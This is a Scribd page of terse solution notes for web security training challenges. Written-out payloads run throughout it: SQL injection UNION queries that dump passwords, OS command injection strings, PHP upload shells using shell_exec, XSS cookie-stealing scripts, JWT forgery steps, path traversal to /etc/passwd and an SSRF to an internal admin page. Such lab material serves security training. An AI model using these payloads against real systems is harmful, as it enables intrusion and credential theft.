KEMBAR78
Solution Notes TH | PDF | Http Cookie | Login
Scribd
Upload
77 views5 pages

Solution Notes TH

1. Several vulnerabilities are demonstrated including broken authentication, insecure direct object references, cross-site scripting, insecure deserialization, insecure direct object references, and lack of access control. 2. Methods of exploiting these vulnerabilities are provided such as bypassing authentication by removing form inputs or guessing default credentials, escalating privileges by modifying cookie values, and extracting sensitive data by using SQL injection or server-side request forgery. 3. Users are instructed how to decode and modify JSON web tokens to change user privileges, exploit XXE vulnerabilities in ASP.NET, and forge requests to access administrative interfaces.

Uploaded by

sam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
77 views5 pages

Solution Notes TH

1. Several vulnerabilities are demonstrated including broken authentication, insecure direct object references, cross-site scripting, insecure deserialization, insecure direct object references, and lack of access control. 2. Methods of exploiting these vulnerabilities are provided such as bypassing authentication by removing form inputs or guessing default credentials, escalating privileges by modifying cookie values, and extracting sensitive data by using SQL injection or server-side request forgery. 3. Users are instructed how to decode and modify JSON web tokens to change user privileges, exploit XXE vulnerabilities in ASP.NET, and forge requests to access administrative interfaces.

Uploaded by

sam
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 5

Broken Authentication:

Tutorial

Password Recovery:

Enumerate with different colours. There is no limitation on the number of attempts. Answer is black.

Broken 2FA:

It's not hard to guess the admin password: admin


Use an intercepting proxy or simply remove the inputs from the source code, then submit the form!
Because there are no answers, the Checking answers part is skipped and your account has been
verified!
Congratulations, you're admin now!

Hide and Seek:

Try with the link: /users.

Secure Bank:

o Log in with the demo account


o Click Print
o Copy the URL from the popup window (https://challengeid.subdomain.avatao-
challenge.com/print.php?id=25)
o Keep changing the id until you see your target (Fredrick Ellis)
o Submit his balance as flag (without $)

Unsavoury Cookies:

Log in as bob, go to an arbitrary product's page, and open the developer tools (F12 for most
browsers).
Then check the stored cookies! You will see a cookie with name IsModerator and value 0. Set the
value to 1 and refresh the page - and tadaaaa: the magical Delete comment button is now there
under your control. Click on it and your flag will appear!

Good Old JWT:

Decode the JWT token.

Update the alg to None

Change the user to admin and send the request.

Secret Admin:

Register and Login

Select Admin.

Observe the request in Repeater.

Try modifying the JWT token, but application responds with error.

Run jwtcracker in kali linux.


Get the secret (ezpz)

In the jwt.io, add ezpz and update the role to admin

Send the request with the updated JWT and solved!!

CSRF Adventures:

Tutorial. Stick to issue, don’t go to code remediation.

CSRF Demo:

Check the html file and perform a normal CSRF.

Hello Stored XSS

<script>alert(document.cookie)</script>

Reflected XSS

<script>alert('xss')</script>

Cookie Protection in Flask:

Explain why httponly is important

AlerThemer

x' onerror='alert(1)' t='

x' onerror='alert(1)'

Injection:

Show by trying aaaa, aaa’,

Solution: admin’ —

Where is my data:

In statican, key word parameter

'UNION SELECT name, null FROM sqlite_master --

'UNION SELECT username, age FROM user –

I want that password:

Step 1: test—

Step 2: test' UNION SELECT 1,2,3,4,5,6,7,8,9—

Step 3: test' UNION SELECT 1,2,3,4,password,6,7,8,9 from Users—

Step 3: test' UNION SELECT 1,2,3,4, password,6,7,8,9 from Users where Userid=1—

Ping the World - Part 1


127.0.0.1
127.0.0.1;id
127.0.0.1;ls
127.0.0.1;cat flag.txt

Ping the World - Part 1.5


127.0.0.1
127.0.0.1;id
127.0.0.1|id
127.0.0.1|ls -la
127.0.0.1|ls -la secret_directory
127.0.0.1|ls -la secret_directory/Right
127.0.0.1|cat secret_directory/Right/flag.txt

Local Real Estate Inclusion


Tutorial
Agent name=etc/passwd

Eye Land 1
<?php
print("hello");
?>

<?php
$output = shell_exec(‘ls -la’);
echo "<pre>$output</pre>";
?>

<?php
$output = shell_exec('cat ../../../home/user/flag.txt');
echo "<pre>$output</pre>";
?>

Eye Land 2

<?php
print("hello");
?>

Change content type to image/png and extension to php5


<?php
print("hello");
?>

<?php
$output = shell_exec('find /home/user/*/flag*');
echo "<pre>$output</pre>";
?>
<?php
$output = shell_exec('find /home/user/*/flag*');
echo "<pre>$output</pre>";
?>

<?php

$output = shell_exec('cat /home/user/bevydrr7x5/flag.txt');

echo "<pre>$output</pre>";

?>

XXE with ASP.NET

Tutorial (sample files in folder)

SSRF with XXE

Tutorial

Real Estate Request Forgery

Follow the steps, navigate to properties and click on More info.

Intercept the request

Observe the internal LOCAL HOST IP

CHANGE THIS TO 127.0.0.1:9191/admin

Admin login wow

L1K3 API 1

Monitor your network traffic while liking or disliking posts to get the API URL.
Since they call it API, maybe it's not just for AJAX calls.
Visit the https://challenge.subdomain.avatao-challenge.com/api/v1/users or https://
challenge.subdomain.avatao-challenge.com/api/v1/user/1 URL
and you will find the admin password. Login with it to get your flag!

Free Money

Register a normal user account.

Observe request response

Register new user:

{"name":"hacker","username":"hacker","password":"hacker","address":"hac
ker", "balance": 99999}

You might also like